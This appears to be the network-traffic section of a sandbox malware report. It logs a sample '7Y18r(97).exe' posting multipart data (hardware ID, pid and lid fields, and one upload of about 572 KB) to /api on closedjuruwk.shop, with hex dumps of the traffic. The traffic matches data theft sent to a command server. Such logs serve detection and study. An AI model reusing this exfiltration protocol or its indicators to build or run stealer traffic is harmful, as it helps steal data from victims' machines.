                2024-07-24 19:02:09 UTC1369INData Raw: 33 64 33 63 0d 0a 76 52 55 66 6f 30 6e 6e 55 70 47 6c 58 30 31 34 63 68 74 33 2f 66 2b 64 48 32 35 37 2f 32 6e 61 5a 55 6f 33 43 46 31 73 65 35 44 31 4c 42 4b 2f 53 75 70 42 33 37 59 55 57 7a 68 30 46 6a 6d 76 74 4e 5a 58 49 6e 44 6e 4c 35 41 72 61 69 67 53 58 57 4a 2b 68 62 73 58 47 4c 78 4c 36 45 57 62 71 55 68 44 66 58 51 55 64 4f 58 78 6e 52 39 75 65 2f 39 70 32 6d 56 66 44 68 39 66 64 33 66 44 67 68 6f 66 76 30 50 37 46 34 44 6e 51 77 4a 2f 66 31 6f 68 74 2f 66 52 58 43 64 35 36 44 75 49 4b 57 51 6f 48 30 5a 76 65 6f 43 35 46 68 71 39 51 66 39 63 6b 4b 46 56 51 33 56 2b 45 58 33 33 74 4a 4d 52 4b 57 53 6e 63 63 49 45 61 44 55 4b 54 48 63 79 74 4c 51 58 48 37 5a 53 72 55 6a 52 73 42 70 46 64 44 4e 43 4f 66 62 34 30 56 41 68 65 75 30 68 67 53 52 33 4d
                Data Ascii: 3d3cvRUfo0nnUpGlX014cht3/f+dH257/2naZUo3CF1se5D1LBK/SupB37YUWzh0FjmvtNZXInDnL5AraigSXWJ+hbsXGLxL6EWbqUhDfXQUdOXxnR9ue/9p2mVfDh9fd3fDghofv0P7F4DnQwJ/f1oht/fRXCd56DuIKWQoH0ZveoC5Fhq9Qf9ckKFVQ3V+EX33tJMRKWSnccIEaDUKTHcytLQXH7ZSrUjRsBpFdDNCOfb40VAheu0hgSR3M
                2024-07-24 19:02:09 UTC1369INData Raw: 37 6a 37 6b 51 48 62 6c 49 36 6b 57 53 72 46 4a 49 63 58 59 57 64 50 54 6d 33 6c 42 75 4d 71 63 75 6d 6d 55 39 65 6a 39 38 55 56 50 42 71 46 63 49 38 55 50 68 46 38 66 70 57 30 70 2f 66 52 35 72 2b 65 62 54 56 69 35 36 37 79 47 46 4b 57 73 30 43 6b 64 6e 63 49 2b 34 45 52 69 31 52 65 6c 54 6b 36 34 61 44 44 68 30 41 6a 6d 76 74 50 56 53 4e 47 61 6c 42 34 6b 6c 59 69 6f 4f 56 43 5a 76 7a 36 35 5a 46 72 30 45 74 52 65 62 6f 6c 42 4c 65 33 6f 65 64 50 66 39 30 6c 67 6d 63 65 38 37 67 79 39 33 50 68 31 4f 61 58 71 46 76 78 55 65 76 55 44 2f 58 4e 2f 6e 47 6b 56 67 4d 30 49 35 31 2f 2f 4c 63 6a 78 75 70 7a 62 4d 50 43 55 39 46 41 38 2b 4d 49 69 37 47 42 43 37 51 75 5a 53 6b 71 6c 66 53 48 39 2f 47 6e 6e 30 38 74 74 63 4a 6e 54 72 4a 59 45 6f 59 44 34 4b 58 57
                Data Ascii: 7j7kQHblI6kWSrFJIcXYWdPTm3lBuMqcummU9ej98UVPBqFcI8UPhF8fpW0p/fR5r+ebTVi567yGFKWs0CkdncI+4ERi1RelTk64aDDh0AjmvtPVSNGalB4klYioOVCZvz65ZFr0EtRebolBLe3oedPf90lgmce87gy93Ph1OaXqFvxUevUD/XN/nGkVgM0I51//LcjxupzbMPCU9FA8+MIi7GBC7QuZSkqlfSH9/Gnn08ttcJnTrJYEoYD4KXW
                2024-07-24 19:02:09 UTC1369INData Raw: 46 52 7a 78 43 71 31 51 68 2b 6b 43 41 6c 39 70 46 33 2f 67 35 65 68 57 4c 69 32 6e 4e 73 77 38 4a 54 30 55 44 7a 34 77 6a 4c 73 54 48 4c 52 41 35 56 43 63 71 46 5a 47 64 58 34 65 63 50 50 78 7a 30 4d 6f 63 75 63 6d 6a 43 70 70 4b 42 5a 4b 5a 6e 7a 42 2b 56 6b 57 71 51 53 31 46 36 36 2b 57 67 4a 6e 50 51 4d 35 38 50 69 64 43 57 35 7a 36 6a 75 4f 4b 6d 55 37 47 30 74 74 64 34 65 78 47 42 4b 30 52 2b 68 52 6e 71 6c 57 53 48 39 37 45 48 66 36 38 74 6c 58 4b 44 79 70 61 59 55 39 4a 57 4a 59 66 57 74 2b 69 4c 51 66 48 4b 64 73 33 42 65 41 35 30 4d 43 66 33 39 61 49 62 66 77 31 6c 6b 69 65 65 38 73 67 79 31 76 4d 68 64 41 64 48 47 4f 76 68 34 61 76 45 76 6a 55 70 47 37 58 55 6c 7a 65 78 4e 33 38 62 53 54 45 53 6c 6b 70 33 48 43 45 32 59 30 45 31 35 70 63 34 33
                Data Ascii: FRzxCq1Qh+kCAl9pF3/g5ehWLi2nNsw8JT0UDz4wjLsTHLRA5VCcqFZGdX4ecPPxz0MocucmjCppKBZKZnzB+VkWqQS1F66+WgJnPQM58PidCW5z6juOKmU7G0ttd4exGBK0R+hRnqlWSH97EHf68tlXKDypaYU9JWJYfWt+iLQfHKds3BeA50MCf39aIbfw1lkiee8sgy1vMhdAdHGOvh4avEvjUpG7XUlzexN38bSTESlkp3HCE2Y0E15pc43
                2024-07-24 19:02:09 UTC1369INData Raw: 51 71 74 55 49 66 70 41 67 4a 4a 5a 52 31 2b 2b 4c 62 30 56 6a 56 39 37 53 71 4a 4b 53 55 6c 56 6c 59 6d 64 34 33 33 51 56 47 38 53 4f 42 54 6a 61 56 61 51 6e 46 30 45 47 76 34 2b 39 42 53 4c 6e 6e 31 4b 4a 41 71 62 6a 38 62 53 32 6c 2f 6a 62 38 54 55 66 38 45 36 6b 2f 66 38 52 70 75 65 32 49 51 4f 39 44 75 79 31 59 69 62 65 77 6b 6a 6d 56 36 64 41 45 50 59 58 7a 42 37 31 6b 52 73 45 6e 2f 55 70 36 6a 55 45 39 77 66 42 39 38 2b 50 44 5a 57 69 42 75 36 53 61 43 49 32 34 37 48 55 78 74 65 6f 2b 2b 43 31 48 2f 42 4f 70 50 33 2f 45 61 61 47 4e 79 46 33 57 31 32 74 5a 48 4b 54 37 47 4a 34 6b 69 61 53 78 59 55 43 68 70 77 62 41 56 55 65 6b 45 35 46 6d 54 71 6c 31 4b 63 48 59 61 63 76 66 37 31 31 38 70 62 75 30 6c 69 44 64 71 4f 52 56 4c 61 33 71 45 76 67 73 55
                Data Ascii: QqtUIfpAgJJZR1++Lb0VjV97SqJKSUlVlYmd433QVG8SOBTjaVaQnF0EGv4+9BSLnn1KJAqbj8bS2l/jb8TUf8E6k/f8Rpue2IQO9Duy1YibewkjmV6dAEPYXzB71kRsEn/Up6jUE9wfB98+PDZWiBu6SaCI247HUxteo++C1H/BOpP3/EaaGNyF3W12tZHKT7GJ4kiaSxYUChpwbAVUekE5FmTql1KcHYacvf7118pbu0liDdqORVLa3qEvgsU
                2024-07-24 19:02:09 UTC1369INData Raw: 66 52 36 56 31 61 4f 43 74 61 53 2f 33 33 30 55 63 6a 63 36 63 32 7a 44 77 6c 50 52 51 50 50 6a 43 54 70 52 6b 61 73 55 50 6a 52 5a 36 68 56 55 68 34 64 52 46 7a 39 50 33 5a 58 79 64 36 35 69 53 44 4a 47 55 2f 47 45 5a 30 66 63 48 35 57 52 61 70 42 4c 55 58 71 4b 56 52 63 33 74 6c 57 6d 61 35 37 5a 31 57 49 6a 79 2f 61 59 4d 33 61 44 49 63 54 32 74 32 69 72 59 59 45 72 46 45 37 6c 65 61 6f 6c 56 45 66 33 34 51 63 50 37 6d 31 56 55 38 66 4f 73 74 77 6d 73 6c 50 51 41 50 50 6a 43 78 74 42 49 64 73 55 6e 34 46 34 44 6e 51 77 4a 2f 66 31 6f 68 74 2f 7a 57 57 69 68 33 35 43 71 4d 4c 6d 38 31 46 30 56 67 64 6f 6d 79 47 52 32 78 51 65 74 54 6d 36 64 64 54 48 56 79 43 48 72 2b 74 4a 4d 52 4b 57 53 6e 63 63 49 46 62 69 77 64 53 48 41 79 74 4c 51 58 48 37 5a 53 72
                Data Ascii: fR6V1aOCtaS/330Ucjc6c2zDwlPRQPPjCTpRkasUPjRZ6hVUh4dRFz9P3ZXyd65iSDJGU/GEZ0fcH5WRapBLUXqKVRc3tlWma57Z1WIjy/aYM3aDIcT2t2irYYErFE7leaolVEf34QcP7m1VU8fOstwmslPQAPPjCxtBIdsUn4F4DnQwJ/f1oht/zWWih35CqMLm81F0VgdomyGR2xQetTm6ddTHVyCHr+tJMRKWSnccIFbiwdSHAytLQXH7ZSr
                2024-07-24 19:02:09 UTC1369INData Raw: 49 41 69 41 7a 58 58 72 6c 35 74 74 53 4f 48 2b 67 46 37 77 46 62 6a 59 62 51 32 64 33 77 66 6c 5a 48 76 45 63 31 42 65 63 75 30 67 4e 61 57 55 58 61 66 43 34 31 55 41 6a 63 4b 64 6e 77 6d 6c 68 4d 52 52 4b 59 57 44 4f 70 51 6b 61 76 56 4b 68 55 34 33 70 46 41 4a 70 65 42 56 72 2b 66 4f 53 51 44 68 78 39 79 71 48 49 69 6b 79 43 55 4a 71 4d 4d 2f 33 44 42 71 39 51 75 42 43 30 4c 68 4d 51 57 35 30 56 6e 48 6d 2b 64 45 52 45 54 4b 6e 4d 63 4a 39 4a 51 38 62 51 57 68 33 6c 36 5a 55 4d 62 70 49 37 6c 75 65 72 68 6f 4d 4f 48 56 61 49 61 53 36 6e 56 55 2f 50 4c 39 35 30 48 34 77 61 55 38 66 4e 47 2f 50 72 6c 6b 48 38 52 79 2f 47 64 2b 37 47 68 6f 34 4e 42 6c 72 35 66 4c 65 52 79 30 37 32 52 65 44 4b 47 70 32 46 6b 52 6d 64 35 47 68 41 6c 32 35 52 2f 64 4e 6f 5a
                Data Ascii: IAiAzXXrl5ttSOH+gF7wFbjYbQ2d3wflZHvEc1Becu0gNaWUXafC41UAjcKdnwmlhMRRKYWDOpQkavVKhU43pFAJpeBVr+fOSQDhx9yqHIikyCUJqMM/3DBq9QuBC0LhMQW50VnHm+dERETKnMcJ9JQ8bQWh3l6ZUMbpI7luerhoMOHVaIaS6nVU/PL950H4waU8fNG/PrlkH8Ry/Gd+7Gho4NBlr5fLeRy072ReDKGp2FkRmd5GhAl25R/dNoZ
                2024-07-24 19:02:09 UTC1369INData Raw: 54 53 31 6f 38 4f 53 66 64 79 31 71 35 47 6e 4d 5a 58 31 36 51 41 39 48 65 70 47 36 46 68 62 78 57 36 4e 4f 33 37 38 61 47 69 73 39 57 6d 75 33 72 4a 30 57 49 48 48 6d 4b 6f 77 6d 64 79 67 65 54 48 42 7a 78 6f 6b 6e 4e 4c 78 4a 36 46 6d 59 6c 32 52 6a 63 6d 4d 58 64 76 43 32 2f 56 59 34 66 39 6b 58 74 54 52 69 4b 6c 70 70 5a 57 61 43 39 31 64 52 71 51 53 31 46 37 36 6a 53 6b 39 33 64 46 68 5a 38 4f 4c 65 45 54 45 79 2f 6d 6d 55 5a 54 31 70 56 67 39 30 4d 4e 6e 33 58 68 4b 6a 56 75 74 55 69 61 6f 64 66 45 5a 65 43 48 37 6e 39 35 39 67 49 33 6a 78 50 49 45 31 59 67 51 6d 59 6e 52 33 6b 62 52 62 49 4b 64 48 37 56 6d 59 36 52 51 43 59 44 4e 43 4f 64 72 6d 32 6b 45 74 50 50 68 6e 6d 32 56 7a 65 6b 41 63 4b 44 43 54 39 30 46 52 39 6b 72 67 56 70 79 6e 57 56 42
                Data Ascii: TS1o8OSfdy1q5GnMZX16QA9HepG6FhbxW6NO378aGis9Wmu3rJ0WIHHmKowmdygeTHBzxoknNLxJ6FmYl2RjcmMXdvC2/VY4f9kXtTRiKlppZWaC91dRqQS1F76jSk93dFhZ8OLeETEy/mmUZT1pVg90MNn3XhKjVutUiaodfEZeCH7n959gI3jxPIE1YgQmYnR3kbRbIKdH7VmY6RQCYDNCOdrm2kEtPPhnm2VzekAcKDCT90FR9krgVpynWVB


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.849713188.114.97.34437724C:\Users\user\Desktop\7Y18r(97).exe
                TimestampBytes transferredDirectionData
                2024-07-24 19:02:10 UTC283OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 12841
                Host: closedjuruwk.shop
                2024-07-24 19:02:10 UTC12841OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 34 44 36 34 39 42 30 42 45 44 34 45 36 38 33 46 33 43 42 42 33 36 32 44 46 36 33 39 33 37 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 55 54 45 36 65 59 2d 2d 0d 0a 2d 2d 62
                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E4D649B0BED4E683F3CBB362DF63937D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"UTE6eY----b
                2024-07-24 19:02:11 UTC806INHTTP/1.1 200 OK
                Date: Wed, 24 Jul 2024 19:02:11 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=ode72t2mk7jomnqu94qq5ohruc; expires=Sun, 17-Nov-2024 12:48:49 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=47KA0iGMKgnO0nAYtHL9oVZHaQp44CBteRfUaq3n9GZoM3YCfQeVIMOn7N%2B295MuT7V%2F8UONZWbyTc8KloqOxlrKWvZj8JLRydmAshwG0ZlRiwHu%2FxKAHvdfR%2Fkv6U45WIOC5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a8629bd4d697c7e-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-24 19:02:11 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                Data Ascii: eok 8.46.123.33
                2024-07-24 19:02:11 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.849714188.114.97.34437724C:\Users\user\Desktop\7Y18r(97).exe
                TimestampBytes transferredDirectionData
                2024-07-24 19:02:11 UTC283OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 15070
                Host: closedjuruwk.shop
                2024-07-24 19:02:11 UTC15070OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 34 44 36 34 39 42 30 42 45 44 34 45 36 38 33 46 33 43 42 42 33 36 32 44 46 36 33 39 33 37 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 55 54 45 36 65 59 2d 2d 0d 0a 2d 2d 62
                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E4D649B0BED4E683F3CBB362DF63937D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"UTE6eY----b
                2024-07-24 19:02:12 UTC808INHTTP/1.1 200 OK
                Date: Wed, 24 Jul 2024 19:02:12 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=at5te5j5ot60bs65vl8phouhcu; expires=Sun, 17-Nov-2024 12:48:51 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wpoq2d4yxx8hS4iyQkMJCaNvTKPe%2BISZ9zhFGc9yLFiSuE6WodkotHubI0T1SXuJEYTnkv42W4e1EcfaJJv%2BJo6cMJmwWRBV%2FzBmaVg%2BP5tR%2F4XrCOhcJP5CUXmfb4YNWASSmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a8629c47c5c0cc1-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-24 19:02:12 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                Data Ascii: eok 8.46.123.33
                2024-07-24 19:02:12 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.849715188.114.97.34437724C:\Users\user\Desktop\7Y18r(97).exe
                TimestampBytes transferredDirectionData
                2024-07-24 19:02:13 UTC283OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 20237
                Host: closedjuruwk.shop
                2024-07-24 19:02:13 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 34 44 36 34 39 42 30 42 45 44 34 45 36 38 33 46 33 43 42 42 33 36 32 44 46 36 33 39 33 37 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 55 54 45 36 65 59 2d 2d 0d 0a 2d 2d 62
                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E4D649B0BED4E683F3CBB362DF63937D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"UTE6eY----b
                2024-07-24 19:02:13 UTC4906OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00
                Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
                2024-07-24 19:02:13 UTC810INHTTP/1.1 200 OK
                Date: Wed, 24 Jul 2024 19:02:13 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=77hmd0tf1ebrfcsf01dkej9pmn; expires=Sun, 17-Nov-2024 12:48:52 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FXqkUtCyZGVNPHcvlQZbsMBjVjdqdUT3jFFjxTCPZtbQu1nmMuI3h%2FL836H8t2J98kYv8MgHfCt3KDJhNQkfC%2BrFtT%2BlKRcfUdZtCC8CASDofxdzru507cOwpJOw%2B2mBv9ah%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a8629cc89c40f81-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-24 19:02:13 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                Data Ascii: eok 8.46.123.33
                2024-07-24 19:02:13 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.849716188.114.97.34437724C:\Users\user\Desktop\7Y18r(97).exe
                TimestampBytes transferredDirectionData
                2024-07-24 19:02:14 UTC282OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 1242
                Host: closedjuruwk.shop
                2024-07-24 19:02:14 UTC1242OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 34 44 36 34 39 42 30 42 45 44 34 45 36 38 33 46 33 43 42 42 33 36 32 44 46 36 33 39 33 37 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 55 54 45 36 65 59 2d 2d 0d 0a 2d 2d 62
                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E4D649B0BED4E683F3CBB362DF63937D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"UTE6eY----b
                2024-07-24 19:02:15 UTC802INHTTP/1.1 200 OK
                Date: Wed, 24 Jul 2024 19:02:15 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=o6dllq2vo3d8tvfp2ibfi8ghh0; expires=Sun, 17-Nov-2024 12:48:53 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fzx8HZ9fAt8vArgjperOytL676FfJENLSwxLTjzltQnUTDCUG%2BvFwWtXFtZWAseGn0415hW8Dftet28vLeHE3sdIZ6c7Q0XeGbyjPElSznIygS6wR4umd61u0BRnFA%2FMj6VlKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a8629d59d244345-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-24 19:02:15 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                Data Ascii: eok 8.46.123.33
                2024-07-24 19:02:15 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.849717188.114.97.34437724C:\Users\user\Desktop\7Y18r(97).exe
                TimestampBytes transferredDirectionData
                2024-07-24 19:02:16 UTC284OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 572697
                Host: closedjuruwk.shop
                2024-07-24 19:02:16 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 34 44 36 34 39 42 30 42 45 44 34 45 36 38 33 46 33 43 42 42 33 36 32 44 46 36 33 39 33 37 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 55 54 45 36 65 59 2d 2d 0d 0a 2d 2d 62
                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E4D649B0BED4E683F3CBB362DF63937D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"UTE6eY----b
